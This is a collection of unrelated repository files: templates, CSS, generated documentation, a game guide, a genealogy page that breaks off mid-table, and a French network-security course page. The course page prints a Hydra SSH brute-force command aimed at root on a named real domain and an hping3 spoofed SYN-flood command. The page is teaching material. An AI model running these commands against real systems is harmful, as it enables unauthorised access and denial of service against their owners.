class="navbar" border="0" width="100%" cellpadding="0" bgcolor="#a0c0ff" cellspacing="0"> <tr valign="middle"> <!-- Home link --> <th>&nbsp;&nbsp;&nbsp;<a href="schrodinger-module.html">Home</a>&nbsp;&nbsp;&nbsp;</th> <!-- Tree link --> <th>&nbsp;&nbsp;&nbsp;<a href="module-tree.html">Trees</a>&nbsp;&nbsp;&nbsp;</th> <!-- Index link --> <th>&nbsp;&nbsp;&nbsp;<a href="identifier-index.html">Indices</a>&nbsp;&nbsp;&nbsp;</th> <!-- Help link --> <th>&nbsp;&nbsp;&nbsp;<a href="help.html">Help</a>&nbsp;&nbsp;&nbsp;</th> <!-- Project homepage --> <th class="navbar" align="right" width="100%"> <table border="0" cellpadding="0" cellspacing="0"> <tr><th class="navbar" align="center" >Suite 2012 Schrodinger Python API</th> </tr></table></th> </tr> </table> <table border="0" cellpadding="0" cellspacing="0" width="100%%"> <tr> <td align="left" class="footer"> Generated by Epydoc 3.0.1 on Tue Sep 25 02:23:03 2012 </td> <td align="right" class="footer"> <a target="mainFrame" href="http://epydoc.sourceforge.net" >http://epydoc.sourceforge.net</a> </td> </tr> </table> <script type="text/javascript"> <!-- // Private objects are initially displayed (because if // javascript is turned off then we want them to be // visible); but by default, we want to hide them. So hide // them unless we have a cookie that says to show them. checkCookie(); // --> </script> </body> </html>
interfaz/public/_views/common/_paginacion.html
alejomongua/esqueleto
<% var total_paginas = Math.ceil(total/por_pagina) %> <% var page = parseInt(pagina) %> <% var ruta = '/' + modelo %> <% if (total_paginas > 1) { %> <% if (page !== 1) { %> <a href="<%- ruta %>?page=1" class="btn btn-xs btn-info <%- modelo %>-first"><i class="icon-fast-backward"></i> Primera</a> <a href="<%- ruta %>?page=<%- page - 1 %>" class="btn btn-xs btn-info <%- modelo %>-prev"><i class="icon-step-backward"></i> Anterior</a> <% } else { %> <a href="#" class="btn btn-xs btn-info disabled" disabled><i class="icon-fast-backward"></i> Primera</a> <a href="#" class="btn btn-xs btn-info disabled" disabled><i class="icon-step-backward"></i> Anterior</a> <% } %> <span class="paginador-current-report">Página <%- pagina %> de <%- total_paginas %></span> <% if (page !== total_paginas) { %> <a href="<%- ruta %>?page=<%- page + 1 %>" class="btn btn-xs btn-info <%- modelo %>-next"><i class="icon-step-forward"></i> Siguiente</a> <a href="<%- ruta %>?page=<%- total_paginas %>" class="btn btn-xs btn-info <%- modelo %>-last"><i class="icon-fast-forward"></i> Última</a> <% } else { %> <a href="#" class="btn btn-xs btn-info disabled" disabled><i class="icon-fast-forward"></i> Siguiente</a> <a href="#" class="btn btn-xs btn-info disabled" disabled><i class="icon-step-forward"></i> Última</a> <% } %> <% } %>
sql/Tools & Optional/Websites/I_CSwowd/lang/map_ru/533.html
borgotech/Infinity_MaNGOS
<div class="faq"> <div class="window"> <b>Краткая сводка:</b> <li>Уровень: 60</li> <li>Зона: Contested</li> <li>Тип подземелья: <b>Raid (40-man)</b></li> <li>Location: <a href="?zone=139">Eastern Plaguelands</a></li> <li>Фракция: <a href="?faction=529">Argent Dawn</a></li> <li>Последний босс: <a href="?npc=15990">Kel'Thuzad</a></li> <li>Attunement: <a href="?quest=9122">The Dread Citadel</a></li> </div> <h4>Naxxramas</h4> <B>Naxxramas</B> - это огромный некрополис, парящий в воздухе над <A href="?zone=139">Eastern Plaguelands</A>. Он имеет сомнительную честь служить пристанищем для одного из наиболее могущественных командиров <b>Lich King</b>'а – ужасного <A href="?npc=15990">Kel'Thuzad</A>'а. <br> <br> Данное подземелье предназначено для рейд-группы из 40 человек и разделено на 4 части, которые игрокам предстоит пройти, чтобы попасть в пятую - заключительную - часть под названием <b>Frostwyrm Lair</b>. Прохождение четырех частей может выполняться в любой последовательности. <br> <br> Для получения доступа необходимо отдать некоторое количество материалов в зависимости от уровня вашей репутации у фракции <A href="?faction=529">Argent Dawn</A>. Если ваша репутация находится на уровне <A href="?quest=9123">Exalted</A>, то доступ будет предоставлен вам бесплатно. <br> <br> <h4>История</h4> <B>Naxxramas</B>, древняя башня, построенная <b>Nerubian</b>'ами, была вырвана из земли помощниками <b>Lich King</b>'а с целью использования в качестве операционного штаба <A href="?npc=15990">Kel'Thuzad</A>'а во время наложения им проклятия на земли <b>Lordaeron</b>'а. <br> <br> В связи с тем, что <A href="?npc=15990">Kel'Thuzad</A> воевал с силами <b>Scarlet Crusade</b>, фракцией <A href="?spell=17350">Argent Dawn</A>, с людьми и нежитью из Альянса, а также постоянно подвергался налетам со стороны искателей приключений всех рас и наций, ежедневно вторгавшихся в контролируемую <b>Scourge</b> часть <b>Plaguelands</b>, его войска были в основном заняты охраной подступов к некрополису. Но сейчас, когда врата <B>Naxxramas</B> открылись, новые солдаты <A href="?npc=15990">Kel'Thuzad</A>'а стали стремительно сметать всех врагов <b>Scourge</b>. <br> <br> <h4>Достойный внимания лут </h4> Со всех боссов в <B>Naxxramas</B> падают жетоны, используемые для завершения квестов на получение частей брони класса Tier 3. С <A href="?npc=15990">Kel'thuzad</A>'а падает кольцо, являющееся частью комплекта Tier 3 Raid Set. <br> <br> В <B>Naxxramas</B> начинается сбор частей <A href="?s=i&class=2.10&name=Atiesh">[Atiesh, Greatstaff of the Guardian]</A>. Все боссы (кроме <A href="?npc=15990">Kel'thuzad</A>'а и <A href="?npc=15989">Sapphiron</A>'а) в некоторых случаях выбрасывают <A href="?item=22726">[Splinter of Atiesh]</A>. Соединив 40 шт., можно создать <A href="?item=22727">[Frame of Atiesh]</A>, что положит начало квесту, по которому нужно будет поговорить с <A href="?npc=15192">Anachronos</A>. Тот пошлет вас за <A href="?item=22733">[Staff Head of Atiesh]</A> и <A href="?item=22734">[Base of Atiesh]</A>, выбить которые можно из <A href="?npc=15990">Kel'Thuzad</A>'а и <A href="?npc=15727">C'Thun</A>'а, соответственно. </div>
mesure-4.html
jeremysalmon/coursSecurite
<!doctype html> <!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang=""> <![endif]--> <!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8" lang=""> <![endif]--> <!--[if IE 8]> <html class="no-js lt-ie9" lang=""> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang=""> <!--<![endif]--> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <title>Cours Sécurité des Réseaux</title> <meta name="description" content="Cours de téléphonie sur IP avec Asterisk"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="apple-touch-icon" href="apple-touch-icon.png"> <link rel="stylesheet" href="css/bootstrap.min.css"> <style> body { padding-top: 50px; padding-bottom: 20px; } </style> <link rel="stylesheet" href="css/bootstrap-theme.min.css"> <link rel="stylesheet" href="css/main.css"> <script src="js/vendor/modernizr-2.8.3-respond-1.4.2.min.js"></script> </head> <body> <!--[if lt IE 8]> <p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your browser</a> to improve your experience.</p> <![endif]--> <nav class="navbar navbar-inverse navbar-fixed-top" role="navigation"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="navbar-brand" href="sommaire.html">Cours Sécurité (sommaire)</a> </div> </div> </nav> <div class="container-fluid"> <div class="col-md-8 col-md-offset-2"> <h2>Attaques de l'extérieur</h2> <img src="img/attaque_externe.svg" class="img-responsive"> <hr> <h3>Découverte des ports ouverts et brute force</h3> <p>La première méthode que l'on rencontre est qu'un attaquant extérieur découvre les ports ouverts sur notre adresse IP publique (avec nmap) par exemple.</p> <p>L'attaquant utilise ensuite un logiciel de brute force comme Hydra par exemple. Afin de se faciliter la tâche, il peut utiliser des "dictionnaires" de mots de passe téléchargeables sur Internet comme par exemple <a href="https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm" target="_blank">https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.htm</a></p> <code> hydra -t 4 -l root -P petitFichier.txt ssh://www.estem.ma</code> <hr> <h3>Deni de Service</h3> <p>L'autre attaque qui ne vise pas à "pénétrer" dans un réseau mais à interrompre un service est le Deni de Service.</p> <p>Pour effectuer un DOS il suffit par exemple d'utiliser l'utilitaire hping3 qui va faire des requête SYN jusqu'a saturer la machine distante :</p> <code>hping3 -S -a y.y.y.y --flood -p 80 x.x.x.x</code> <p>Ou : </p> <ul> <li>y.y.y.y : l'adresse de la machine pour laquelle on veut se faire passer</li> <li>x.x.x.x : l'adresse de la machine que l'on veut attaquer</li> </ul> <hr> <h3>Utilisation de failles connues</h3> <p>Les logiciels ont de nombreuses failles de sécurité. Ces failles sont pour la plupart référencées dans <a href="https://cve.mitre.org/" target="_blank">https://cve.mitre.org/</a>.</p> <p>Des outils comme Metasploit permettent de parcourir une machine à la recherche de faille CVE potientielles.</p> <hr> <h2>Attaques de l'intérieur</h2> <hr> <h3>Rejouer des captures</h3> <p>Des outils comme TCPDUMP permettent de capturer le traffic réseau dans un fichier.</p> <p>Avec la commande <code>tcpdump -i eth0 -s0 -w test.pcap</code> vous allez écrire tout le traffic recu par la carte réseau dans un fichier pcap.</p> <p>Des outils d'analyse comme ChaosReader permettent d'analyser ces trames et de générer une page HTML résumant ce qui c'est passé durant la session de capture.</p> <p>Grâce à l'analyse des requêtes POST et GET un attaquant peut rejouer un scénario de connexion à un site Web par exemple.</p> <p><a class="btn btn-primary btn-lg pull-right" href="mesure-5.html" role="button">Continuer &raquo;</a></p> </div> </div> <script src="js/vendor/jquery-1.11.2.min.js"></script> <script src="js/vendor/bootstrap.min.js"></script> <script src="js/main.js"></script> </body> </html>
css/index.css
bigbubble/bigbubble.github.io
body { /**background-color: #000;*/ /**background-image: url(img/eg_bg_04.gif);*/ /**color: #fff;*/ } .center{ margin-left: auto; margin-right: auto; } .element { width: 120px; height: 160px; box-shadow: 0px 0px 12px rgba(0,255,255,0.5); border: 1px solid rgba(127,255,255,0.25); text-align: center; cursor: default; } .element:hover { box-shadow: 0px 0px 12px rgba(0,255,255,0.75); border: 1px solid rgba(127,255,255,0.75); } .element .number { position: absolute; top: 20px; right: 20px; font-size: 12px; color: rgba(127,255,255,0.75); } .element .symbol { position: absolute; top: 40px; left: 0px; right: 0px; font-size: 60px; font-weight: bold; color: rgba(255,255,255,0.75); text-shadow: 0 0 10px rgba(0,255,255,0.95); } .element .details { position: absolute; bottom: 15px; left: 0px; right: 0px; font-size: 12px; color: rgba(127,255,255,0.75); } .button { color: rgba(127,255,255,0.75); background: transparent; outline: 1px solid rgba(127,255,255,0.75); border: 0px; padding: 5px 10px; cursor: pointer; } .button:hover { background-color: rgba(0,255,255,0.5); } .button:active { color: #000000; background-color: rgba(0,255,255,0.75); }
media/com_acymailing/css/component_default_basic_red.css
natalyandreeva/joomla
/** * @package AcyMailing for Joomla! * @version 5.6.1 * @author acyba.com * @copyright (C) 2009-2017 ACYBA S.A.R.L. All rights reserved. * @license GNU/GPLv3 http://www.gnu.org/licenses/gpl-3.0.html */ @import url("component_default_basic_black.css"); #acymodifyform .button:hover, #unsubbutton_div .button:hover, #acyarchivelisting .button:hover { color:#bc1f00;} #acyarchivelisting .contentheading{ color:#770000; border-bottom:1px solid #770000; } #acyarchivelisting .contentpane .contentdescription{ color:#bc1f00; } #acyarchivelisting .sectiontableheader a:hover{ color:#bc1f00; } #acyarchivelisting .contentpane tbody .sectiontableentry1 a:hover{ color:#bc1f00; } #acyarchivelisting .contentpane tbody .sectiontableentry2 a:hover{ color:#bc1f00; } #acyarchiveview .contentheading{ color:#bc1f00;} #acylistslisting .componentheading{ color:#770000; border-bottom:1px solid #770000; } #acylistslisting .list_name a{ color:#bc1f00; } #acylistslisting .list_name a:hover, #acylistslisting .list_name a:focus { color:#bc1f00; } #acymodifyform legend{ color:#770000; border-bottom:1px solid #770000; } #acyusersubscription .list_name{ color: #bc1f00; } #unsubpage .unsubintro{ color:#770000; border-bottom: 1px solid #770000; } #unsubpage .unsubsurveytext{ color:#770000; border-bottom: 1px solid #770000; }
core/modules/mod_eprivacy/assets/css/mod_eprivacy.css
hubzero/hubzero-cms
/** * @package hubzero-cms * @copyright Copyright (c) 2005-2020 The Regents of the University of California. * @license http://opensource.org/licenses/MIT MIT */ /* Default styles */ .mod_eprivacy { margin: 0; padding: 1em 5em 1em 2em; position: fixed; bottom: 0; left: 0; right: 0; background-color: #f8ee7b; z-index: 10000; width: 100%; color: #333; } .mod_eprivacy-close { display: block; position: absolute; top: 0; right: 0; bottom: 0; background-color: #e4d53f; text-align: left; padding: 0.5em; font-size: 2em; border: none !important; } .mod_eprivacy-close:hover { border: none !important; } .mod_eprivacy-close span { display: block; width: 1em; height: 1em; overflow: hidden; white-space: nowrap; } .mod_eprivacy-close span:before { font-family: 'Fontcons'; content: "\2716"; padding: 0.2em; }
sites/all/modules/cck/theme/content.css
pirog/mdo
/* $Id: content.css,v 1.12.2.3 2008/08/22 22:10:57 yched Exp $ */ /* Node display */ .field .field-label, .field .field-label-inline, .field .field-label-inline-first { font-weight:bold; } .field .field-label-inline, .field .field-label-inline-first { display:inline; } .field .field-label-inline { visibility:hidden; } /* Node form display */ .node-form .content-multiple-table td.content-multiple-drag { width:30px; padding-right:0; } .node-form .content-multiple-table td.content-multiple-drag a.tabledrag-handle{ padding-right:.5em; } .node-form .content-add-more .form-submit{ margin:0; } .node-form .number { display:inline; width:auto; } .node-form .text { width:auto; } /* CSS overrides for Views-based autocomplete results. - #autocomplete uses "white-space:pre", which is no good with Views' template-based rendering - Field titles are rendered with <label> in default templates, but we don't want the 'form' styling it gets under .form-item */ .form-item #autocomplete .reference-autocomplete { white-space:normal; } .form-item #autocomplete .reference-autocomplete label { display:inline; font-weight:normal; } /* 'Manage fields' overview */ table.content-field-overview, table.content-field-overview fieldset table { width:100%; } table.content-field-overview td { width:14%; } .content-field-overview-empty { text-align:center; }
doc/html/namespacemembers.html
kinoraw/kinoraw_tools
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" content="Doxygen 1.8.6"/> <title>Kinoraw Tools: Namespace Members</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="jquery.js"></script> <script type="text/javascript" src="dynsections.js"></script> <link href="doxygen.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="top"><!-- do not remove this div, it is closed by doxygen! --> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td id="projectlogo"><img alt="Logo" src="jump_to_cut_panel_001.png"/></td> <td style="padding-left: 0.5em;"> <div id="projectname">Kinoraw Tools </div> </td> </tr> </tbody> </table> </div> <!-- end header part --> <!-- Generated by Doxygen 1.8.6 --> </div><!-- top --> <div class="contents"> <div class="textblock">Here is a list of all namespace members with links to the namespace documentation for each member:</div> <h3><a class="anchor" id="index_a"></a>- a -</h3><ul> <li>act_strip() : <a class="el" href="namespacekinoraw__tools_1_1functions.html#adac038d3e61d8fba3e0d526695f767b6">kinoraw_tools::functions</a> </li> <li>add_marker() : <a class="el" href="namespacekinoraw__tools_1_1functions.html#a213c725e829d988f84105c54f35d1051">kinoraw_tools::functions</a> </li> <li>align : <a class="el" href="namespacekinoraw__tools_1_1jumptocut.html#af29c72f5ffed70d5a5a283221eb4d4a3">kinoraw_tools::jumptocut</a> </li> </ul> <h3><a class="anchor" id="index_b"></a>- b -</h3><ul> <li>basestring : <a class="el" href="namespacekinoraw__tools_1_1exiftool.html#ae9ba889b7e9446b78d42cd8a837653cd">kinoraw_tools::exiftool</a> </li> <li>bl_description : <a class="el" href="namespacekinoraw__tools_1_1jumptocut.html#a63f210ae1df7473a61a1271bb9c3762e">kinoraw_tools::jumptocut</a> </li> <li>bl_idname : <a class="el" href="namespacekinoraw__tools_1_1jumptocut.html#a90837065caae87ff942aefc88095a87b">kinoraw_tools::jumptocut</a> </li> <li>bl_info : <a class="el" href="namespacekinoraw__tools.html#acfb532d1827a93d7503aa8d3571b33aa">kinoraw_tools</a> </li> <li>bl_label : <a class="el" href="namespacekinoraw__tools_1_1jumptocut.html#a438a100c19901ff0ebe5097dde76bda8">kinoraw_tools::jumptocut</a> </li> <li>bl_options : <a class="el" href="namespacekinoraw__tools_1_1jumptocut.html#aa3a7dc1e2e9aa4233a97ab53e4b9cfc4">kinoraw_tools::jumptocut</a> </li> <li>block_size : <a class="el" href="namespacekinoraw__tools_1_1exiftool.html#ad7bac69337a171ae5dd180fd48841ad3">kinoraw_tools::exiftool</a> </li> </ul> <h3><a class="anchor" id="index_c"></a>- c -</h3><ul> <li>clip_clip_menu_func() : <a class="el" href="namespacekinoraw__tools_1_1ui.html#a4dc959c37357fb6b86a0162109ce1e55">kinoraw_tools::ui</a> </li> <li>clip_header_func() : <a class="el" href="namespacekinoraw__tools_1_1ui.html#a16d97651e9af07765e2d890c2a1ded85">kinoraw_tools::ui</a> </li> <li>create_folder() : <a class="el" href="namespacekinoraw__tools_1_1functions.html#a6f2c970d249a88451b8d81f485d1f819">kinoraw_tools::functions</a> </li> <li>create_proxy() : <a class="el" href="namespacekinoraw__tools_1_1proxy__tools.html#a23c553d0b6264f28b946722ab1dcd3ca">kinoraw_tools::proxy_tools</a> </li> <li>create_proxy_scripts() : <a class="el" href="namespacekinoraw__tools_1_1proxy__tools.html#a6bcb7f3e3429e4cedc7f9a67f6fb0da3">kinoraw_tools::proxy_tools</a> </li> <li>createavi() : <a class="el" href="namespacekinoraw__tools_1_1datamosh.html#a7ecee003214ecc51dfc29cfbe3ad2f00">kinoraw_tools::datamosh</a> </li> <li>createavimjpeg() : <a class="el" href="namespacekinoraw__tools_1_1datamosh.html#abccbddf84a9105b5fa5a8a61530f0e49">kinoraw_tools::datamosh</a> </li> <li>createdatamosh() : <a class="el" href="namespacekinoraw__tools_1_1datamosh.html#aed3ecd7c508760b803cefe2cde0951e5">kinoraw_tools::datamosh</a> </li> <li>createsyncfile() : <a class="el" href="namespacekinoraw__tools_1_1audio__tools.html#aa781edbb610c0fcb8aaa467a0052025a">kinoraw_tools::audio_tools</a> </li> </ul> <h3><a class="anchor" id="index_d"></a>- d -</h3><ul> <li>detect_strip_type() : <a class="el" href="namespacekinoraw__tools_1_1functions.html#a77e0e7766ac1eb9b5ae5940a9d01b89a">kinoraw_tools::functions</a> </li> <li>draw_color_balance() : <a class="el" href="namespacekinoraw__tools_1_1ui.html#abe839c21f66eed3748719a8a4c6a5b5d">kinoraw_tools::ui</a> </li> </ul> <h3><a class="anchor" id="index_e"></a>- e -</h3><ul> <li>executable : <a class="el" href="namespacekinoraw__tools_1_1exiftool.html#a84ecc4dad00e48c6f4288a36b85893e0">kinoraw_tools::exiftool</a> </li> <li>execute() : <a class="el" href="namespacekinoraw__tools_1_1jumptocut.html#ac5595fcbacf254a88e95c36121d3ad2d">kinoraw_tools::jumptocut</a> </li> </ul> <h3><a class="anchor" id="index_f"></a>- f -</h3><ul> <li>fsencode : <a class="el" href="namespacekinoraw__tools_1_1exiftool.html#a7b8e9249cacc366be42da33b7c92a271">kinoraw_tools::exiftool</a> </li> </ul> <h3><a class="anchor" id="index_g"></a>- g -</h3><ul> <li>generate_subsets_list() : <a class="el" href="namespacekinoraw__tools_1_1functions.html#a09196451c93f518f5b91f0c820d47639">kinoraw_tools::functions</a> </li> <li>get_cut_dict() : <a class="el" href="namespacekinoraw__tools_1_1functions.html#ac7209744df499a6886827880df706ffa">kinoraw_tools::functions</a> </li> <li>get_marker_dict() : <a class="el" href="namespacekinoraw__tools_1_1functions.html#a0310a140c297671df78f7aa1ed003869">kinoraw_tools::functions</a> </li> <li>get_matching_markers() : <a class="el" href="namespacekinoraw__tools_1_1functions.html#a43f8432b6f53d12b7ed407d065671126">kinoraw_tools::functions</a> </li> <li>get_selected_strips() : <a class="el" href="namespacekinoraw__tools_1_1functions.html#a0f24c5673d466069109618c903461d44">kinoraw_tools::functions</a> </li> <li>getfilepathfrombrowser() : <a class="el" href="namespacekinoraw__tools_1_1functions.html#a5c7c2bf35faf1c1938474f0db854287e">kinoraw_tools::functions</a> </li> <li>getpathfrombrowser() : <a class="el" href="namespacekinoraw__tools_1_1functions.html#aa51b6d6b00254b35ee6fcd4e1822a112">kinoraw_tools::functions</a> </li> </ul> <h3><a class="anchor" id="index_i"></a>- i -</h3><ul> <li>imb_ext_audio : <a class="el" href="namespacekinoraw__tools_1_1functions.html#ab28e9c9e6f561913a5d6f9693714f933">kinoraw_tools::functions</a> </li> <li>imb_ext_image : <a class="el" href="namespacekinoraw__tools_1_1functions.html#acf7240b191f8546a7a39cf3117123137">kinoraw_tools::functions</a> </li> <li>imb_ext_movie : <a class="el" href="namespacekinoraw__tools_1_1functions.html#a2da8d4e8ac8324659a139a4f76d0493b">kinoraw_tools::functions</a> </li> <li>initSceneProperties() : <a class="el" href="namespacekinoraw__tools_1_1functions.html#a05b273850356cd1af9955215a3cb5d3b">kinoraw_tools::functions</a> </li> </ul> <h3><a class="anchor" id="index_m"></a>- m -</h3><ul> <li>marker_handler() : <a class="el" href="namespacekinoraw__tools_1_1jumptocut.html#a87751d3a1cd9398f974ff05786a4ccb4">kinoraw_tools::jumptocut</a> </li> <li>movieextdict : <a class="el" href="namespacekinoraw__tools_1_1functions.html#ae7ca1e89c86400f8d5c3676e9429fc40">kinoraw_tools::functions</a> </li> </ul> <h3><a class="anchor" id="index_o"></a>- o -</h3><ul> <li>onefolder() : <a class="el" href="namespacekinoraw__tools_1_1functions.html#abb0b4ce4b13e43ba63b216adf8f6cda0">kinoraw_tools::functions</a> </li> </ul> <h3><a class="anchor" id="index_p"></a>- p -</h3><ul> <li>poll() : <a class="el" href="namespacekinoraw__tools_1_1jumptocut.html#a1ed16c2e212ff34b31b4fe5039be7721">kinoraw_tools::jumptocut</a> </li> <li>proxy_qualities : <a class="el" href="namespacekinoraw__tools_1_1audio__tools.html#a30c903fb0872711a5dd08e8af543c7de">kinoraw_tools::audio_tools</a> , <a class="el" href="namespacekinoraw__tools_1_1datamosh.html#a2256201eb5ac37f64e17a8c9b7bcdeeb">kinoraw_tools::datamosh</a> , <a class="el" href="namespacekinoraw__tools_1_1proxy__tools.html#abb967cb0b010e2b2c7be7681497aa88e">kinoraw_tools::proxy_tools</a> </li> </ul> <h3><a class="anchor" id="index_r"></a>- r -</h3><ul> <li>random_edit_from_random_subset() : <a class="el" href="namespacekinoraw__tools_1_1functions.html#af93853e4146a29a92adf9345f4cf1f3f">kinoraw_tools::functions</a> </li> <li>randomframe() : <a class="el" href="namespacekinoraw__tools_1_1functions.html#a9081271653f9f152ea07dd72a4064165">kinoraw_tools::functions</a> </li> <li>randompartition() : <a class="el" href="namespacekinoraw__tools_1_1functions.html#a204f661afb0040ca3bf85acea94e9b3e">kinoraw_tools::functions</a> </li> <li>readsyncfile() : <a class="el" href="namespacekinoraw__tools_1_1audio__tools.html#ac2dad93a34c911508a6257777c01bed0">kinoraw_tools::audio_tools</a> </li> <li>recursive() : <a class="el" href="namespacekinoraw__tools_1_1functions.html#aa376f7db9db38b4672e3cb347305d61f">kinoraw_tools::functions</a> </li> <li>register() : <a class="el" href="namespacekinoraw__tools.html#a7c3974a99f9b0ec9ba475be6e7559f15">kinoraw_tools</a> </li> </ul> <h3><a class="anchor" id="index_s"></a>- s -</h3><ul> <li>sentinel : <a class="el" href="namespacekinoraw__tools_1_1exiftool.html#adafd0bcfd46814787a4ca69a19b07006">kinoraw_tools::exiftool</a> </li> <li>sequencer_add_menu_func() : <a class="el" href="namespacekinoraw__tools_1_1ui.html#ac2a6b13757086fe50e8a9840553b43d9">kinoraw_tools::ui</a> </li> <li>sequencer_header_func() : <a class="el" href="namespacekinoraw__tools_1_1ui.html#aab5d2683632718f8f596d805180a25bc">kinoraw_tools::ui</a> </li> <li>sequencer_select_menu_func() : <a class="el" href="namespacekinoraw__tools_1_1ui.html#a282f23f9d96b7fcec1889642368b7a15">kinoraw_tools::ui</a> </li> <li>sequencer_strip_menu_func() : <a class="el" href="namespacekinoraw__tools_1_1ui.html#a52b5d9c52cd827c1fd7e34abcd9fec31">kinoraw_tools::ui</a> </li> <li>setpathinbrowser() : <a class="el" href="namespacekinoraw__tools_1_1functions.html#a9c6f2ac0bad05e9d6dc9ffe00ad5126b">kinoraw_tools::functions</a> </li> <li>setup_proxy() : <a class="el" href="namespacekinoraw__tools_1_1proxy__tools.html#a1c57755a4eeeaa11d3787c6284644a06">kinoraw_tools::proxy_tools</a> </li> <li>side : <a class="el" href="namespacekinoraw__tools_1_1jumptocut.html#aeb3a26355c83cf62d006e2e71232ac69">kinoraw_tools::jumptocut</a> </li> <li>sortlist() : <a class="el" href="namespacekinoraw__tools_1_1functions.html#a0873f423ee4e30ebab56d27816b2c107">kinoraw_tools::functions</a> </li> </ul> <h3><a class="anchor" id="index_t"></a>- t -</h3><ul> <li>time_frame_menu_func() : <a class="el" href="namespacekinoraw__tools_1_1ui.html#ad291e62f95e34c3c8c4fb95e11779070">kinoraw_tools::ui</a> </li> <li>time_header_func() : <a class="el" href="namespacekinoraw__tools_1_1ui.html#a6920ebaeba30586ffaa7dff8d4a1a188">kinoraw_tools::ui</a> </li> <li>triminout() : <a class="el" href="namespacekinoraw__tools_1_1functions.html#aa68db671c1363e6024a3f90e78448e29">kinoraw_tools::functions</a> </li> </ul> <h3><a class="anchor" id="index_u"></a>- u -</h3><ul> <li>unregister() : <a class="el" href="namespacekinoraw__tools.html#a935e6e38524d78e4b1adb5d477ffa1c9">kinoraw_tools</a> </li> </ul> <h3><a class="anchor" id="index_w"></a>- w -</h3><ul> <li>writesyncfile() : <a class="el" href="namespacekinoraw__tools_1_1audio__tools.html#a99cdd7f6d285595a3e3c8e51378dc821">kinoraw_tools::audio_tools</a> </li> </ul> </div><!-- contents --> <!-- start footer part --> <hr class="footer"/><address class="footer"><small> Generated on Tue Apr 7 2015 18:19:16 for Kinoraw Tools by &#160;<a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/> </a> 1.8.6 </small></address> </body> </html>
gramps42/gramps/example_NAVWEB1/ppl/y/f/9D8KQCG5XB5D7J26FY.html
belissent/testing-example-reports
<!DOCTYPE html> <html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml"> <head lang="en-US"> <title>My Family Tree - Peters, Rose</title> <meta charset="UTF-8" /> <meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" /> <meta name ="apple-mobile-web-app-capable" content="yes" /> <meta name="generator" content="Gramps 4.2.2 http://gramps-project.org/" /> <meta name="author" content="" /> <link href="../../../images/favicon2.ico" rel="shortcut icon" type="image/x-icon" /> <link href="../../../css/narrative-screen.css" media="screen" rel="stylesheet" type="text/css" /> <link href="../../../css/narrative-print.css" media="print" rel="stylesheet" type="text/css" /> <link href="../../../css/ancestortree.css" media="screen" rel="stylesheet" type="text/css" /> </head> <body> <div id="header"> <h1 id="SiteTitle">My Family Tree</h1> </div> <div class="wrapper" id="nav" role="navigation"> <div class="container"> <ul class="menu" id="dropmenu"> <li class = "CurrentSection"><a href="../../../individuals.html" title="Individuals">Individuals</a></li> <li><a href="../../../index.html" title="Surnames">Surnames</a></li> <li><a href="../../../families.html" title="Families">Families</a></li> <li><a href="../../../places.html" title="Places">Places</a></li> <li><a href="../../../sources.html" title="Sources">Sources</a></li> <li><a href="../../../repositories.html" title="Repositories">Repositories</a></li> <li><a href="../../../media.html" title="Media">Media</a></li> <li><a href="../../../thumbnails.html" title="Thumbnails">Thumbnails</a></li> <li><a href="../../../addressbook.html" title="Address Book">Address Book</a></li> </ul> </div> </div> <div class="content" id="IndividualDetail"> <h3>Peters, Rose<sup><small> <a href="#sref1">1</a></small></sup></h3> <div id="summaryarea"> <table class="infolist"> <tr> <td class="ColumnAttribute">Birth Name</td> <td class="ColumnValue"> Peters, Rose </td> </tr> <tr> <td class="ColumnAttribute">Gramps&nbsp;ID</td> <td class="ColumnValue">I0753</td> </tr> <tr> <td class="ColumnAttribute">Gender</td> <td class="ColumnValue">female</td> </tr> <tr> <td class="ColumnAttribute">Age at Death</td> <td class="ColumnValue">87 years</td> </tr> </table> </div> <div class="subsection" id="events"> <h4>Events</h4> <table class="infolist eventlist"> <thead> <tr> <th class="ColumnEvent">Event</th> <th class="ColumnDate">Date</th> <th class="ColumnPlace">Place</th> <th class="ColumnDescription">Description</th> <th class="ColumnNotes">Notes</th> <th class="ColumnSources">Sources</th> </tr> </thead> <tbody> <tr> <td class="ColumnEvent"> Birth </td> <td class="ColumnDate">1608</td> <td class="ColumnPlace"> <a href="../../../plc/v/w/JF3KQCQTREIXBOPWV.html" title="Hilo, HI, USA"> Hilo, HI, USA </a> </td> <td class="ColumnDescription"> Birth of Peters, Rose </td> <td class="ColumnNotes"> <div> </div> </td> <td class="ColumnSources"> &nbsp; </td> </tr> <tr> <td class="ColumnEvent"> Death </td> <td class="ColumnDate">1695</td> <td class="ColumnPlace"> <a href="../../../plc/u/a/QD8KQCBBBZ5NYKIVAU.html" title="Florence, Lauderdale, AL, USA"> Florence, Lauderdale, AL, USA </a> </td> <td class="ColumnDescription"> Death of Peters, Rose </td> <td class="ColumnNotes"> <div> </div> </td> <td class="ColumnSources"> &nbsp; </td> </tr> <tr> <td class="ColumnEvent"> Burial </td> <td class="ColumnDate">&nbsp;</td> <td 